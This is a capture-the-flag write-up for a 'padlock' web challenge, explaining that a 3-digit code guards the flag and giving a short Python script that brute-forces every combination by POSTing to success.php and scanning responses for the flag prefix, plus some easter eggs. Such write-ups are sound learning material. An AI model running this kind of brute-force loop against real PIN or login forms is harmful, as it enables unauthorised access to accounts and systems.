write-ups-challenges-2019-2020/Padlock/writeup.md
2022-11-24 22:43:03 +01:00

40 lines
1.5 KiB
Markdown

# CHALLENGE padlock
## Writeup
To get the flag, a 3-digit code has to be found. As 3 digits only offers 999 combinations, brute-force would be the way to go.
In the source code of `index.php`, we can find that for each try, a POST-request is sent to `success.php`. The post request contains 3 values: `try100`, `try10` and `try1`. In the brute-force we have to enumerate each value from 0 to 9. We can check each response for the flag by looking for `"IG{`. If we got a match the respons might contain a flag.
A simple brute-force program in Python would look like this:
```python
import requests
# change URL path
url = "success.php"
def checkForSolution(text):
if text.find("IG{") == -1:
return False
else:
substr = text.find("IG{")
print(text[substr:text.find("}", substr) + 1])
return True
def bruteForce():
for h in range(10):
for t in range(10):
for u in range(10):
param = {'try100': h, 'try10': t, 'try1': u}
req = requests.post(url, data = param)
print("try:", h, t, u)
if checkForSolution(req.text):
return True
bruteForce()
```
## Easter eggs
In `robots.txt` a file `flag.txt` is disallowed, this file contains an ascii-art of a beautiful flag.
Trying combinations like '420' or '069' will redirect to a new page. Also a cookie is placed, as long as this cookie exists, the index page shows a 4-digit combination. However, this newly placed digit does not do anything.
The cookie placed contains a Base64-string.